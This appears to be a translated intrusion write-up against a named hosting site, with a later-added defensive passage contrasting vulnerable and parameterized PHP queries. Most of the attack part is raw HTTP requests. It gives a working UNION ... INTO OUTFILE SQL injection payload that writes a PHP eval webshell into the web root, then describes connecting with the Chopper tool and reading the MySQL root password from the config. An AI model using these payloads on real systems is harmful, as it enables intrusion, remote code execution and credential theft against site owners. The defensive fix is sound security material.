Target:
http://bmd.yunhosting.com/

First, capture the traffic for the form submission. The injection point turns out to be here:

            POST http://bmd.yunhosting.com/index.php/bmd/dosubmit HTTP/1.1
            Host: bmd.yunhosting.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:42.0) Gecko/20100101 Firefox/42.0
            Accept: */*
            Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
            Accept-Encoding: gzip, deflate
            DNT: 1
            Content-Type: application/x-www-form-urlencoded; charset=UTF-8
            X-Requested-With: XMLHttpRequest
            Referer: http://bmd.yunhosting.com/
            Content-Length: 8
            Cookie: Hm_lvt_cf15af24cbbc54d86b08019142283d7d=1447398749
            Connection: keep-alive
            Pragma: no-cache
            Cache-Control: no-cache

            domain='

The response comes back as:

            HTTP/1.1 500 Internal Server Error
            Date: Sat, 19 Dec 2015 05:28:23 GMT
            Server: Apache/2.2.3 (CentOS)
            X-Powered-By: PHP/5.1.6
            Content-Length: 1466
            Connection: close
            Content-Type: text/html; charset=UTF-8

            ......
                <div id="container">
                    <h1>A Database Error Occurred</h1>
                    Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' limit 1' at line 1

SELECT domain,type FROM common_bmd where domain = '======this is the injection point========' limit 1

Filename: /var/www/html/models/m_common.php

Line Number: 27
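The error page above prints the query with the POST value spliced straight into the SQL text, which is why a lone quote breaks the statement. As an added example (not the site's own code), here is that pattern in PHP with PDO beside the parameterized form that closes it; the table and column names come from the error message, while the DSN and credentials are placeholders.

```php
<?php
// Added example, not the site's code. Table and column names are taken from the
// error message on the page; the connection details below are placeholders.

// VULNERABLE: the POST value is concatenated into the SQL text. A single quote in
// $domain terminates the string literal, so MySQL reports error 1064 (as seen in
// the response above) and anything after the quote is parsed as SQL.
function lookupDomainVulnerable(PDO $pdo, string $domain): ?array
{
    $sql = "SELECT domain,type FROM common_bmd where domain = '" . $domain . "' limit 1";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// FIXED: a server-side prepared statement sends the SQL text and the value
// separately, so the value is only ever compared against the column and can
// never alter the statement's structure.
function lookupDomainSafe(PDO $pdo, string $domain): ?array
{
    $stmt = $pdo->prepare('SELECT domain, type FROM common_bmd WHERE domain = ? LIMIT 1');
    $stmt->execute([$domain]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Placeholder connection (constructed); use the application's real DSN and an
// account that holds only SELECT/INSERT/UPDATE on its own tables.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=bmd;charset=utf8mb4', 'app_user', 'app_password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, not client-side quoting
]);

// Constructed input mirroring the probe on the page: a single quote.
$probe = "'";

try {
    lookupDomainVulnerable($pdo, $probe);        // throws: SQLSTATE[42000] syntax error (1064)
} catch (PDOException $e) {
    echo "vulnerable query failed: " . $e->getMessage() . PHP_EOL;
}

var_dump(lookupDomainSafe($pdo, $probe));        // NULL: no such domain, and no SQL error
```

The prepared statement removes the injection; the file write shown later on this page additionally depended on the application's MySQL account holding the FILE privilege and on the web root being writable by the MySQL server process, so a least-privilege DB account and a restrictive secure_file_priv setting would have stopped that step even with the bug present.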

OK, let's go with a union. The query has two columns, and the web root path was handed to us in the error, so we can craft a request that writes a webshell directly = =

            POST http://bmd.yunhosting.com/index.php/bmd/dosubmit HTTP/1.1
            Host: bmd.yunhosting.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:42.0) Gecko/20100101 Firefox/42.0
            Accept: */*
            Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
            Accept-Encoding: gzip, deflate
            DNT: 1
            Content-Type: application/x-www-form-urlencoded; charset=UTF-8
            X-Requested-With: XMLHttpRequest
            Referer: http://bmd.yunhosting.com/
            Content-Length: 93
            Cookie: Hm_lvt_cf15af24cbbc54d86b08019142283d7d=1447398749
            Connection: keep-alive
            Pragma: no-cache
            Cache-Control: no-cache

            domain=' union Select 1,'< ?php eval($_POST[cmd]);?>' into outfile '/var/www/html/test2.php' #

Then visit http://bmd.yunhosting.com/test2.php ,

and we can see the file was written successfully.

(WeChat screenshot 20151219133505)

Next, connect with Chopper (菜刀),

(WeChat screenshot 20151219133740)

Take a look, it works.

(WeChat screenshot 20151219133939)

Then the virtual terminal. By the way, why does this box have a higher clock speed when it's also a cloud host? = = Please upgrade mine.

(WeChat screenshot 20151219134204)

From there we can read the database config file and obtain the MySQL root password.

(WeChat screenshot 20151219134518)

Then, go in and have a look.

(WeChat screenshot 20151219135052)